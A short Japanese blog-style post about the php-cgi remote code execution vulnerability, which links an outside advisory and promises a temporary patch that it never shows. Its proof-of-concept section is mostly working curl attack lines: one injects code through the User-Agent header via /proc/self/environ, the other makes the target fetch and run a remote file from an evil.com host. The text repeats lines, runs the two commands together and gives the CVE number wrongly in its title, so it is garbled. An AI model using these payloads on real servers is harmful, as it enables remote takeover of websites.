CVE-2012-823 php-cgiリモートコード実行
823 ワード
CVE-2012-823、php-cgiリモートコード実行、FastCGIは影響を受けません。PHPの公式パッチはまだ公開されていません。影響を受けた駅長は文章の下に提供された方法で臨時パッチをしてください。
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
via:knownsec
POC:
1、ローカルに直接実行コードが含まれています。
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
via:knownsec
POC:
1、ローカルに直接実行コードが含まれています。
curl -H "USER-AGENT: " http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-ncurl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt